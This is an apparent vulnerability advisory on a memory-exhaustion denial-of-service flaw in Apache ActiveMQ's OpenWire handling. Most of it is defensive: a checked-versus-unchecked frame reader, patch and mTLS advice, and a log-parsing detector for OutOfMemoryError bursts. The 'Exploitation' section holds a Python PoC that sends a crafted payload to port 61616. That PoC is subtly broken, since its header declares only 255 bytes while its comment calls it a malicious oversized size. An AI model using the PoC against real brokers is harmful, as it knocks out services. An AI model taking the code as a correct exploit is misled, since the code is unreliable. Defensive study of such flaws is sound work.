Apache ActiveMQ: Memory Allocation Vulnerability, CVE-2025-XXXX (Moderate)

The vulnerability in Apache ActiveMQ arises during the unmarshalling of OpenWire commands, where buffer size values are not properly validated. This lack of validation allows an attacker to craft malicious OpenWire messages with excessively large buffer size values, triggering uncontrolled memory allocation. When processed, these messages force the ActiveMQ broker to allocate disproportionate amounts of memory, leading to resource exhaustion.
Since the broker does not enforce mutual TLS by default, unauthenticated remote attackers can exploit this flaw to cause a denial of service (DoS) by overwhelming the system’s available memory. The issue impacts multiple versions of ActiveMQ, including 5.16.x before 5.16.8, 5.17.x before 5.17.7, 5.18.x before 5.18.7, and 6.x before 6.1.6.
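The check the advisory says is missing, shown as an added example rather than ActiveMQ's own code: a minimal reader for length-prefixed frames in the OpenWire style (4-byte big-endian size, then payload). The unchecked reader sizes its buffer from the peer's declared value; the hardened reader rejects the declaration before allocating, grows the buffer only with bytes that actually arrive, and checks nested length fields against the bytes remaining in the frame. MAX_FRAME_SIZE, declare(), and the 4-byte layout are assumptions for the example; ActiveMQ's real unmarshalling is Java, and the cap plays the role of its wireFormat.maxFrameSize transport option.

```python
import struct
from io import BytesIO

# Cap on what a peer may declare. Assumed value for this example; it plays the
# role of ActiveMQ's wireFormat.maxFrameSize transport option.
MAX_FRAME_SIZE = 100 * 1024 * 1024


class FrameTooLarge(ValueError):
    """A declared size exceeds what the enclosing context allows."""


def declare(size, payload):
    """Build a constructed frame whose 4-byte big-endian header claims `size`
    bytes, regardless of how many bytes actually follow."""
    return struct.pack(">I", size) + payload


def read_frame_unchecked(raw):
    """Vulnerable pattern: size the buffer from the untrusted header.

    Returns (declared, allocated, received) so the mismatch is visible:
    three payload bytes are enough to drive a multi-megabyte allocation.
    """
    stream = BytesIO(raw)
    header = stream.read(4)
    if len(header) < 4:
        raise EOFError("truncated frame header")
    (size,) = struct.unpack(">I", header)
    buf = bytearray(size)          # allocation driven by the peer's number
    received = stream.readinto(buf)
    return size, len(buf), received


def read_frame_checked(raw, max_frame_size=MAX_FRAME_SIZE):
    """Hardened pattern: bound the declared size before touching memory, then
    grow the buffer only with bytes that actually arrive."""
    stream = BytesIO(raw)
    header = stream.read(4)
    if len(header) < 4:
        raise EOFError("truncated frame header")
    (size,) = struct.unpack(">I", header)
    if size > max_frame_size:
        raise FrameTooLarge(f"declared frame size {size} exceeds limit {max_frame_size}")
    buf = bytearray()
    while len(buf) < size:
        chunk = stream.read(min(64 * 1024, size - len(buf)))
        if not chunk:
            raise EOFError(f"peer declared {size} bytes but sent only {len(buf)}")
        buf.extend(chunk)
    return bytes(buf)


def read_sized_field(payload, offset=0):
    """A length-prefixed field nested inside an already-bounded frame.

    The inner length is checked against the bytes remaining in the frame, not
    only against the global cap: a frame that passed the outer check can still
    carry an inner length far larger than the frame itself.
    Returns (field_bytes, next_offset).
    """
    if offset + 4 > len(payload):
        raise EOFError("truncated field length")
    (length,) = struct.unpack_from(">I", payload, offset)
    remaining = len(payload) - offset - 4
    if length > remaining:
        raise FrameTooLarge(f"field length {length} exceeds remaining {remaining} bytes")
    start = offset + 4
    return payload[start:start + length], start + length


if __name__ == "__main__":
    lying = declare(8 * 1024 * 1024, b"abc")   # constructed: claims 8 MiB, carries 3 bytes
    print("unchecked:", read_frame_unchecked(lying))
    try:
        read_frame_checked(lying, max_frame_size=1024)
    except FrameTooLarge as err:
        print("checked:", err)
    body = read_frame_checked(declare(9, declare(5, b"hello")))
    print("nested field:", read_sized_field(body))
```

The two readers see the same bytes; the difference is where the peer's number is trusted. The unchecked one allocates first and asks questions never, so a 3-byte message costs the broker whatever the header says. The checked one treats the header as a claim to verify against a configured ceiling and against what actually arrives, which is the same shape as the upstream fix.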

DailyCVE Form:

Platform: Apache ActiveMQ
Version: <6.1.6, <5.18.7, <5.17.7, <5.16.8
Vulnerability: Memory exhaustion
Severity: Moderate
Date: May 7, 2025

What Undercode Say:

Exploitation:

  1. Craft a malicious OpenWire message with an oversized buffer length.
  2. Send the payload to the ActiveMQ broker over the OpenWire protocol.
  3. Trigger uncontrolled memory allocation, crashing the service.

PoC (Python Snippet):

import socket

target = "activemq_server"  # broker host
port = 61616                # default OpenWire port
payload = b"\x00\x00\x00\xFF" + b"A" * 0xFFFFFF  # Malicious size value
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendall(payload)
s.close()

Mitigation:

  1. Patch: Upgrade to ActiveMQ 6.1.6+, 5.18.7+, 5.17.7+, or 5.16.8+.
  2. Workaround: Enforce mutual TLS for broker connections.
  3. Monitoring: Detect abnormal memory spikes via:

     grep 'java.lang.OutOfMemoryError' /opt/activemq/data/activemq.log
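The grep above finds the symptom; turning it into an alert needs timestamps and context. This is an added example, not from the advisory or the ActiveMQ project: it parses log lines in ActiveMQ's default log4j layout ("%d | %-5p | %m | %c | %t", an assumption to adjust against the deployed log4j2.properties), pulls the client address out of the transport thread name where one is present, and flags bursts of OutOfMemoryError within a time window. The sample log lines, addresses and thread names are constructed for the example.

```python
import re
from datetime import datetime, timedelta

# Constructed sample in the style of ActiveMQ's default log4j layout
# ("%d | %-5p | %m | %c | %t"); every line here is made up for the example.
SAMPLE_LOG = """\
2025-05-07 10:15:01,004 | INFO  | Apache ActiveMQ (localhost, ID:broker-1) started | org.apache.activemq.broker.BrokerService | main
2025-05-07 10:15:22,113 | WARN  | Transport Connection to: tcp://203.0.113.7:51234 failed | org.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport: tcp:///203.0.113.7:51234@61616
2025-05-07 10:15:22,120 | ERROR | Could not accept connection : java.lang.OutOfMemoryError: Java heap space | org.apache.activemq.broker.TransportConnector | ActiveMQ Transport Server: tcp://0.0.0.0:61616
2025-05-07 10:15:23,001 | ERROR | java.lang.OutOfMemoryError: Java heap space | org.apache.activemq.broker.TransportConnection | ActiveMQ Transport: tcp:///203.0.113.7:51240@61616
2025-05-07 11:30:00,000 | ERROR | java.lang.OutOfMemoryError: Java heap space | org.apache.activemq.broker.TransportConnection | ActiveMQ Transport: tcp:///198.51.100.9:40001@61616
not a log line at all
"""

# Assumed layout: timestamp | level | message | logger | thread.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2},\d{3}) \| (?P<level>\w+)\s*\| "
    r"(?P<msg>.*?) \| (?P<logger>\S+) \| (?P<thread>.*)$"
)
OOM_RE = re.compile(r"java\.lang\.OutOfMemoryError")
# Client address embedded in transport thread names such as
# "ActiveMQ Transport: tcp:///203.0.113.7:51240@61616".
PEER_RE = re.compile(r"tcp:///([^@\s]+)@")


def parse_line(line):
    """Split one log line into its fields, or return None if it does not fit the layout."""
    m = LINE_RE.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%d %H:%M:%S,%f")
    return rec


def peer_of(rec):
    """Client host:port from the thread name, or None for broker-side threads."""
    m = PEER_RE.search(rec["thread"])
    return m.group(1) if m else None


def find_oom_events(text):
    """Return (timestamp, peer) for every line that carries an OutOfMemoryError."""
    events = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec and OOM_RE.search(rec["msg"]):
            events.append((rec["ts"], peer_of(rec)))
    return events


def burst_windows(events, window=timedelta(minutes=5), threshold=2):
    """Start times (ISO strings) of windows holding at least `threshold` OOM events.

    One OOM can be a capacity problem; several inside a short window while
    OpenWire is reachable is the pattern worth paging on.
    """
    times = sorted(ts for ts, _ in events)
    starts = []
    left = 0
    for right in range(len(times)):
        while times[right] - times[left] > window:
            left += 1
        if right - left + 1 >= threshold:
            start = times[left].isoformat(sep=" ", timespec="milliseconds")
            if start not in starts:
                starts.append(start)
    return starts


if __name__ == "__main__":
    evts = find_oom_events(SAMPLE_LOG)
    for ts, peer in evts:
        print(ts, peer or "(no client thread)")
    print("burst windows:", burst_windows(evts))
```

The peer address is only a lead, not proof: the thread that hits the OutOfMemoryError is whichever one happened to be allocating when the heap ran out, so correlate it with connection logs and the netstat check below before treating it as the source. Feeding the script the real activemq.log instead of SAMPLE_LOG is a matter of reading the file into `find_oom_events`.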

Detection Command:

netstat -tuln | grep 61616  # Verify OpenWire exposure

Hardening Steps:

  • Restrict OpenWire port (61616) to trusted IPs.
  • Configure JVM memory limits in activemq.conf:
    ACTIVEMQ_OPTS="-Xmx4G -XX:MaxRAMPercentage=70"

Reported By: github.com